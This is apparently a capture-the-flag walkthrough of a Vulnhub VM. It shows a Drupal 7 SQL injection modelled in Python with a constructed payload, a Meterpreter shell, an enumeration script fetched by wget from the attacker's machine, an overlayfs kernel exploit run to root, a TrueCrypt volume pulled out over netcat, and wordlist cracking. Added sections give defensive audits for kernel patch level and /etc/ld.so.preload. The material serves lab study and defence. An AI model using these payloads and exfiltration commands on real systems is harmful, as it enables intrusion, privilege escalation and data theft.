40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  scripts
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  sites
40755/rwxr-xr-x   4096   dir   2014-12-11 06:11:45 -0700  themes
100644/rw-r--r--  19986  fil   2014-12-11 06:11:45 -0700  update.php
100644/rw-r--r--  2178   fil   2014-12-11 06:11:45 -0700  web.config
100644/rw-r--r--  417    fil   2014-12-11 06:11:45 -0700  xmlrpc.php
meterpreter > shell
Process 1227 created.
Channel 0 created.
exit
meterpreter > 
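The Metasploit module gets its shell through the SQL injection in DatabaseConnection::expandArguments() (includes/database/database.inc) in Drupal 7 before 7.32: when a query argument is a PHP array, the array's own keys are spliced into the SQL text to build the :name_0, :name_1 placeholders, and the login form lets a client submit name[...] as an array with keys of its choosing. The following is an added example, not Drupal code and not part of the original walkthrough: a Python restatement of that PHP loop in its vulnerable and 7.32-patched forms, run against the shape of the login query with an attacker-supplied array constructed inline.

```python
"""Added example: Python model of the Drupal 7 < 7.32 expandArguments() bug
(SA-CORE-2014-005 / Drupageddon).  Not Drupal code; it restates the PHP loop so
the injection mechanics can be run and checked locally."""
import re

# Shape of the query the Drupal 7 login path runs; the user-supplied value is
# meant to be a scalar bound to :name.
LOGIN_QUERY = "SELECT * FROM users WHERE name = :name AND status = 1"


def expand_arguments(query, args, fixed=False):
    """Expand array-valued placeholders into :key_0, :key_1, ... the way
    DatabaseConnection::expandArguments() does.

    fixed=False reproduces 7.31 and earlier: the array's keys become SQL text.
    fixed=True reproduces the 7.32 patch: keys are replaced by a counter, so
    nothing attacker-controlled reaches the query string.
    """
    args = dict(args)
    for key, data in [(k, v) for k, v in args.items() if isinstance(v, dict)]:
        if fixed:
            new_keys = {f"{key}_{i}": v for i, v in enumerate(data.values())}
        else:
            new_keys = {f"{key}_{i}": v for i, v in data.items()}
        # PHP: preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query)
        query = re.sub(re.escape(key) + r"\b", lambda _m: ", ".join(new_keys), query)
        del args[key]
        for k, v in new_keys.items():  # PHP's $args += $new_keys
            args.setdefault(k, v)
    return query, args


# Constructed attacker input: the login form posted as
#   name[0 ; UPDATE users SET pass = 'hacked' -- ]=admin&name[1]=admin&pass=x
# which PHP turns into an array with an attacker-chosen string key.
MALICIOUS_NAME = {
    "0 ; UPDATE users SET pass = 'hacked' -- ": "admin",
    1: "admin",
}


def demo():
    """Returns (query built by the vulnerable code, query built by the patched code)."""
    vuln_query, _ = expand_arguments(LOGIN_QUERY, {":name": MALICIOUS_NAME})
    safe_query, _ = expand_arguments(LOGIN_QUERY, {":name": MALICIOUS_NAME}, fixed=True)
    return vuln_query, safe_query


if __name__ == "__main__":
    for q in demo():
        print(q)
```

Run it and the vulnerable branch yields "... WHERE name = :name_0 ; UPDATE users SET pass = 'hacked' -- , :name_1 AND status = 1": a second statement followed by a comment that swallows the rest. The patched branch still produces a malformed query (a scalar placeholder expanded to two), but the attacker-controlled text never reaches the SQL, which is the whole of the 7.32 change; the legitimate IN (:uids) use case expands identically under both.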

Privilege Escalation

Now that we’ve gained initial access, the next logical step would be to see if we can escalate our privileges to root… To help speed up the process, I wrote a small shell script to quickly enumerate Linux-based systems for exploit vectors which can be downloaded here.

wget 192.168.1.60/linux-privesc.sh
--2016-04-29 22:21:14--  http://192.168.1.60/linux-privesc.sh
Connecting to 192.168.1.60:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 14117 (14K) [text/x-sh]
Saving to: 'linux-privesc.sh'

     0K .......... ...                                        100% 12.8M=0.001s

2016-04-29 22:21:14 (12.8 MB/s) - 'linux-privesc.sh' saved [14117/14117]
bash linux*
-[Linux Privilege Escalation Script by 1N3]=--
-[http://treadstonesecurity.blogspot.com]=--

#>01 Whats the distribution type? What version?
#>02 What's the Kernel version? Is it 64-bit?
#>03 What can be learnt from the environmental variables?
#>04 Is there a printer?
#>05 What services are running? Which service has which user
#>06 Which service(s) are been running by root? Of these services, which are vulnerable - its worth a double check!
#>07 What applications are installed? What version are they? Are they currently running?
#>08 Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
#>09 What jobs are scheduled?
#>10 Any plain text usernames and/or passwords?
#>11 What NIC(s) does the system have? Is it connected to another network?
#>12 What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
#>13 Whats cached? IP and/or MAC addresses
#>14 Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
#>15 What sensitive files can be found?
#>16 Anything interesting in the home directorie(s)? If its possible to access
#>17 Are there any passwords in scripts, databases, configuration files or log files? Default paths and locations for passwords
#>18 What has the user being doing? Is there any password in plain text? What have they been edting?
#>19 What user information can be found?
#>20 Can private-key information be found?
#>21 Which configuration files can be written in /etc/? Able to reconfigure a service?
#>22 What can be found in /var/?
#>23 Any settings/files (hidden) on website? Any settings file with database information?
#>24 Is there anything in the log file(s) (Could help with Local File Includes!)
#>25 If commands are limited, you break out of the jail shell?
#>26 How are file-systems mounted?
#>27 Are there any unmounted file-systems?
#>28 Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
#>29 SGID (chmod 2000) - run as the  group, not the user who started it.
#>30 SUID (chmod 4000) - run as the  owner, not the user who started it.
#>31 SGID or SUID
#>32 Where can written to and executed from? A few common places: /tmp, /var/tmp, /dev/shm
#>33 world-writeable folders
#>34 world-writeable & executable folders
#>35 Any problem files? Word-writeable, nobody files
#>36 world-writeable files
#>37 Noowner files
#>38 What development tools/languages are installed/supported?
#>39 How can files be uploaded?

#>01 Whats the distribution type? What version?
#####################################################################
Ubuntu 14.04.1 LTS \n \l

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

#>02 What's the Kernel version? Is it 64-bit?
#####################################################################
Linux version 3.13.0-43-generic ([email protected]) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
Linux 3.13.0-43-generic x86_64
linux-privesc.sh: line 68: rpm: command not found
[    0.000000] Linux version 3.13.0-43-generic ([email protected]) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 (Ubuntu 3.13.0-43.72-generic 3.13.11.11)
[    0.373742] [Firmware Bug]: ACPI: BIOS _OSI(Linux) query ignored
[    0.947541] Linux agpgart interface v0.103
vmlinuz-3.13.0-43-generic

Finding A Local Root Exploit

Now that we know the OS and kernel version, we can quickly search https://www.kernel-exploits.com/ for a suitable exploit. In this case, the overlayfs exploit should do the trick and can be downloaded here.
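The same two facts that point an attacker at kernel-exploits.com, the distribution and the exact kernel build, are what a defender needs to spot the box as unpatched before anyone else does. The following is an added example, not code from the original walkthrough or from any of the tools it mentions: it parses Ubuntu-style `uname -a` lines (the inventory lines, the host names other than `droopy`, and the minimum ABI numbers in the policy table are all constructed placeholders, not a mapping to any particular advisory) and reports hosts whose kernel ABI build is below the minimum the defender has set for that kernel series.

```python
"""Kernel patch-currency audit over inventory lines.

Added example, not part of the original post. Ubuntu kernels carry an
ABI/build number after the upstream version (the 43 in 3.13.0-43-generic);
within one kernel series that number only grows as security updates ship,
so comparing it against a per-series minimum is a cheap way to flag hosts
that have fallen behind. The policy values below are placeholders.
"""
import re
from typing import Dict, List, NamedTuple, Optional, Tuple


class KernelVersion(NamedTuple):
    major: int
    minor: int
    patch: int
    abi: int        # Ubuntu ABI/build number, e.g. 43 in 3.13.0-43-generic
    flavour: str    # e.g. "generic"


# Matches "3.13.0-43-generic" wherever it appears in a uname string.
_KERNEL_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)-(\d+)-([a-z0-9-]+)")


def parse_kernel(uname_line: str) -> Optional[KernelVersion]:
    """Return the kernel version found in a uname -r / uname -a line, or None."""
    m = _KERNEL_RE.search(uname_line)
    if not m:
        return None
    return KernelVersion(int(m[1]), int(m[2]), int(m[3]), int(m[4]), m[5])


def is_below(v: KernelVersion, minimum: Tuple[int, int, int, int]) -> bool:
    """True when v is older than the (major, minor, patch, abi) minimum."""
    return (v.major, v.minor, v.patch, v.abi) < minimum


# Constructed inventory: (hostname, uname -a output). Only the first line is
# taken from the walkthrough; the rest are placeholders.
INVENTORY = [
    ("droopy", "Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux"),
    ("web02", "Linux web02 3.13.0-55-generic #94-Ubuntu SMP x86_64 GNU/Linux"),
    ("build1", "Linux build1 4.4.0-21-generic #37-Ubuntu SMP x86_64 GNU/Linux"),
    ("odd", "SunOS odd 5.11 11.4 i86pc"),
]

# Placeholder policy: minimum acceptable (major, minor, patch, abi) per
# (major, minor) series. Fill this from your own patch baseline.
MINIMUM_ABI: Dict[Tuple[int, int], Tuple[int, int, int, int]] = {
    (3, 13): (3, 13, 0, 55),
    (4, 4): (4, 4, 0, 21),
}


def audit(inventory, policy) -> List[Tuple[str, str, str]]:
    """Return (host, finding, detail) tuples for hosts needing attention."""
    findings = []
    for host, line in inventory:
        v = parse_kernel(line)
        if v is None:
            findings.append((host, "unparsed", line))
            continue
        version_str = f"{v.major}.{v.minor}.{v.patch}-{v.abi}-{v.flavour}"
        required = policy.get((v.major, v.minor))
        if required is None:
            findings.append((host, "no-policy", version_str))
        elif is_below(v, required):
            findings.append((host, "below-minimum", version_str))
    return findings


if __name__ == "__main__":
    for host, finding, detail in audit(INVENTORY, MINIMUM_ABI):
        print(f"{host:8} {finding:15} {detail}")
```

Hosts that do not parse are reported rather than silently skipped, since a host an inventory script cannot classify is exactly the one that drifts out of patching; the per-series policy avoids the mistake of comparing ABI numbers across different kernel series, where they are not comparable.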

meterpreter > shell
Process 30295 created.
Channel 0 created.
pwd
/tmp
./ofs_64.out
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
# whoami
root
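The exploit output above leaves an obvious artefact: `/etc/ld.so.preload created`. On most distributions that file does not exist at all by default, and when it does it should only name libraries under the system library directories, so its appearance, or an entry pointing into a world-writable location, is worth an alert on its own. The following is an added example, not code from the original post or from the exploit; the sample file contents are constructed (the library names are placeholders, not the exploit's real file names), and the trusted directory list is an assumption to adjust for your own builds.

```python
"""Audit /etc/ld.so.preload for unexpected preload entries.

Added example, not part of the original walkthrough. The check is split
into a pure function over the file's text (so it can be tested on a
constructed sample offline) and a thin wrapper that reads the real file.
"""
import os
from typing import List, Tuple

# Assumption: on this host, legitimate preloads only live under these trees.
TRUSTED_DIRS = ("/lib", "/lib64", "/usr/lib", "/usr/lib64")

Finding = Tuple[str, str]   # (finding type, detail)


def audit_ld_preload(content: str, exists: bool = True) -> List[Finding]:
    """Return findings for the given ld.so.preload text.

    exists=False models the normal state where the file is absent.
    """
    findings: List[Finding] = []
    if not exists:
        return findings   # absent file is the expected, quiet state
    findings.append(("present",
                     "/etc/ld.so.preload exists; absent by default on most distributions"))
    for raw in content.splitlines():
        entry = raw.strip()
        if not entry or entry.startswith("#"):
            continue  # blank line or comment, ignored here
        # The file is a whitespace-separated list of shared objects.
        for lib in entry.split():
            if not lib.startswith("/"):
                findings.append(("relative-path", lib))
            elif not any(lib.startswith(d + "/") for d in TRUSTED_DIRS):
                findings.append(("untrusted-dir", lib))
            else:
                findings.append(("trusted-entry", lib))
    return findings


def audit_host(path: str = "/etc/ld.so.preload") -> List[Finding]:
    """Read the real file (if any) and audit it."""
    if not os.path.exists(path):
        return audit_ld_preload("", exists=False)
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_ld_preload(fh.read(), exists=True)


# Constructed sample: one entry dropped into /tmp, one under /usr/lib.
SAMPLE_PRELOAD = "/tmp/lib_x.so\n/usr/lib/libexample-preload.so\n"


def alerts(findings: List[Finding]) -> List[Finding]:
    """Keep only the findings that should page someone."""
    return [f for f in findings if f[0] in ("present", "relative-path", "untrusted-dir")]


if __name__ == "__main__":
    for kind, detail in alerts(audit_ld_preload(SAMPLE_PRELOAD)):
        print(f"ALERT {kind:14} {detail}")
```

Treat the file's existence as the primary signal: a library dropped under `/tmp` or `/dev/shm` is the loud case, but the quiet case, an otherwise plausible path that nobody deployed, is caught only if the baseline expectation is that the file is not there.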

Interesting Email

Now that we’re “root”, we should probably look for that flag. From here I quickly discovered some interesting email under /var/log/mail…

# cd /var
# ls
backups
cache
lib
local
lock
log
mail
opt
run
spool
tmp
www
# cd backups
# cd ../mail
# ls
www-data
# cat www-data
From Dave <[email protected]> Wed Thu 14 Apr 04:34:39 2016
Date: 14 Apr 2016 04:34:39 +0100
From: Dave <[email protected]>
Subject: rockyou with a nice hat!
Message-ID: <[email protected]>
X-IMAP: 0080081351 0000002016l
Status: NN

George,

   I've updated the encrypted file... You didn't leave any
hints for me. The password isn't longer than 11 characters
and anyway, we know what academy we went to, don't you...?

I'm sure you'll figure it out it won't rockyou too much!

If you are still struggling, remember that song by The Jam

Later,
Dave
# 

Interesting File

After getting “root” on the box, I quickly discovered the TrueCrypt volume (/root/dave.tc) and transferred it back to my Kali box using netcat to analyze further…

# pwd
/root/
# ls
dave.tc
# nc -lvvp 4444 < dave.tc
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [192.168.1.60] port 4444 [tcp/*] accepted (family 2, sport 54838)
# ls
dave.tc
# 

Brute Forcing TrueCrypt Volumes

Since we know the TrueCrypt volume is encrypted and password protected, we’ll need a program to run a dictionary attack with, and we’ll use the rockyou.txt wordlist as our dictionary… For this, I chose OTFBrutusGUI, which can be downloaded here.

Mounting the TrueCrypt Volume

Now that we have the password for the volume, we should be able to mount it from our Kali box. NOTE: You’ll need to install TrueCrypt first for this to work… obviously!

Capturing the Flag

Now that our TrueCrypt volume is mounted, we can quickly navigate the directory structure and have no trouble finding our flag.txt, hiding in a hidden directory.

################################################################################
#   ___ ___  _  _  ___ ___    _ _____ _   _ _      _ _____ ___ ___  _  _  ___  #
#  / __/ _ \| \| |/ __| _ \  /_\_   _| | | | |    /_\_   _|_ _/ _ \| \| |/ __| #
# | (_| (_) | .` | (_ |   / / _ \| | | |_| | |__ / _ \| |  | | (_) | .` |\__ \ #
#  \___\___/|_|\_|\___|_|_\/_/ \_\_|  \___/|____/_/ \_\_| |___\___/|_|\_||___/ #
#                                                                              #
################################################################################

Firstly, thanks for trying this VM. If you have rooted it, well done!

Shout-outs go to #vulnhub for hosting a great learning tool. A special thanks
goes to barrebas and junken for help in testing and final configuration.
                                                                    --knightmare